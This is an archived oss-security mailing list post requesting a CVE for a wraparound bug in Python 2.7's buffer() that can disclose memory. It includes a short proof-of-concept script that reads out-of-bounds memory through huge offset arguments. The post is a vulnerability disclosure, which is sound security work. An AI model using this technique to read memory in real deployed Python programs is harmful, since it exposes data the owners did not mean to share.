Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 23 Sep 2014 19:16:27 +0000
From: mancha <>
Subject: CVE Request: Python 2.7


Python 2.7.8 fixes a potential wraparound in buffer() [1a & 1b] with
possible CWE-200 implications [2].

If not yet assigned, please consider a CVE designation for this issue.



(Note: Though the request is for Python 2.7, vulnerable code appears to
exist in EOL'd versions 1.6.1 through 2.6.9 as well)

[1a] Issue report:
[1b] Upstream fix:

[2]  PoC for Python 2.7:

--- ---
import sys
a = bytearray('CVE request')
b = buffer(a, sys.maxsize, sys.maxsize)
print b[:8192]

Content of type "application/pgp-signature" skipped

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ